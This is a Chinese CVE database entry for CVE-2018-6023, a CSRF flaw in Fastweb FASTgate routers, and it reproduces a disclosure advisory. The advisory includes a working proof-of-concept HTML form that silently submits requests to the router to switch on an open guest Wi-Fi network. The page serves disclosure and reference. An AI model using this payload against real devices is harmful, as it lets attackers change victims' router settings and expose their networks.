CVE-2018-6023
CVSS6.8
发布时间 :2018-05-11 17:29:00
修订时间 :2018-06-14 08:46:34
NMP    

[原文]Fastweb FASTgate 0.00.47 devices are vulnerable to CSRF, with impacts including Wi-Fi password changing, Guest Wi-Fi activating, etc.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-352 [跨站请求伪造(CSRF)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6023
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6023
(官方数据源) NVD

- 其它链接及资源

http://packetstormsecurity.com/files/147571/Fastweb-FASTGate-0.00.47-Cross-Site-Request-Forgery.html
(VENDOR_ADVISORY)  MISC  http://packetstormsecurity.com/files/147571/Fastweb-FASTGate-0.00.47-Cross-Site-Request-Forgery.html
https://www.exploit-db.com/exploits/44606/
(VENDOR_ADVISORY)  EXPLOIT-DB  44606

- 漏洞信息 (F147571)

Fastweb FASTGate 0.00.47 Cross Site Request Forgery (PacketStormID:F147571)
2018-05-10 00:00:00
Raffaele Sabato  
exploit,csrf
CVE-2018-6023
[点击下载]

Fastweb FASTGate version 0.00.47 suffers from a cross site request forgery vulnerability.

# Exploit Title: Fastweb FASTgate 0.00.47 CSRF
# Date: 09-05-2018
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Fastweb
# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
# Version: 0.00.47
# CVE: CVE-2018-6023
 
I DESCRIPTION
========================================================================
 
An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site
request forgery (CSRF) vulnerability allows remote attackers to hijack the
authentication of users for requests that modify the configuration.
This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password
changing, etc.
 
II PROOF OF CONCEPT
========================================================================
 
## Activate Gues Wi-Fi:
 
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.254/status.cgi">
      <input type="hidden" name="_" value="1516312144136" />
      <input type="hidden" name="act" value="nvset" />
      <input type="hidden" name="hotspot_broadcast_ssid" value="1" />
      <input type="hidden" name="hotspot_enable" value="1" />
      <input type="hidden" name="hotspot_filtering" value="all" />
      <input type="hidden" name="hotspot_security" value="WPA2PSK" />
      <input type="hidden" name="hotspot_ssid" value="GUEST-Test" />
      <input type="hidden" name="hotspot_timeout" value="-1" />
      <input type="hidden" name="service" value="wl_guestaccess" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
III REFERENCES
========================================================================
http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/


    
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站